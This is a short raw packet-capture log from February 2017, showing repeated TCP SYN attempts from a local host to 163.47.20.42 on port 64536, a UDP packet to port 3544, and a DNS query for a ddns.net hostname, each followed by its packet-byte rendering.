E..4..@…x….f./.*.h….n……. .w……………
2017-02-18 07:59:59.011302 IP 192.168.1.102.56168 > 163.47.20.42.64536: Flags [S], seq 394358472, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…x….f./.*.h….n……. .w……………
2017-02-18 07:59:59.750831 IP 192.168.1.102.56168 > 163.47.20.42.64536: Flags [S], seq 394358472, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0..@…x….f./.*.h….n…..p……………
2017-02-18 08:00:00.347129 IP 192.168.1.102.56169 > 163.47.20.42.64536: Flags [S], seq 4005154394, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…x….f./.*.i…..Z…… .A……………
2017-02-18 08:00:01.086048 IP 192.168.1.102.56169 > 163.47.20.42.64536: Flags [S], seq 4005154394, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…x….f./.*.i…..Z…… .A……………
2017-02-18 08:00:01.827107 IP 192.168.1.102.56169 > 163.47.20.42.64536: Flags [S], seq 4005154394, win 8192, options [mss 1460,nop,nop,sackOK], length 0
E..0..@…x….f./.*.i…..Z….p. .U ……….
2017-02-18 08:00:11.454984 IP 192.168.1.102.63306 > 157.56.31.43.3544: UDP, length 61
E..Y    ……….f.8.+.J…E……..RH…’.`…..:……………………………..}8….
2017-02-18 08:00:12.068271 IP 192.168.1.102.54471 > 75.75.75.75.53: 30946+ A? 2017blessed.ddns.net. (38)
E..B)`………fKKKK…5….x…………2017blessed.ddns.net…..